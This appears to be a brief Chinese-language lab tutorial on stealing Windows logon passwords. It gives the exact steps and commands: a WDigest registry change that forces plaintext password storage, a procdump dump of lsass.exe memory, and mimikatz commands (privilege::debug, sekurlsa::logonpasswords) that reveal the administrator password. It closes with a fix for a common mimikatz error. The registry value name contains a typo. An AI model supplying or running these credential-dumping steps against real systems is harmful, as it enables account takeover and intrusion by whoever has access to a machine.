工具:
procdump & mimikatz
實驗環境:
實驗主機:win10
賬戶密碼:17位複雜密碼(大小寫+特殊字符+數字)
(雖然微軟很早就更新了補丁來防止獲取windows的明文密碼,但是可以修改註冊表...
使 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下的UseLogonCredentiald的鍵值爲1 即代表WDigest的密碼支持明文形式保存在LSA內存中)
步驟:
使用cmd運行procdump.exe
輸入:Procdump.exe -accepteula -ma lsass.exe lsass.dmp
使用cmd運行mimikatz.exe
輸入:privilege::debug
sekurlsa::logonpasswords
在wdigest:下顯示的就是管理員的密碼
補充:
如果按照網上的教程在mimikatz輸入指令這裏100%報錯
(ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005))
privilege::debug(提權)
sekurlsa::logonpasswords(抓密碼)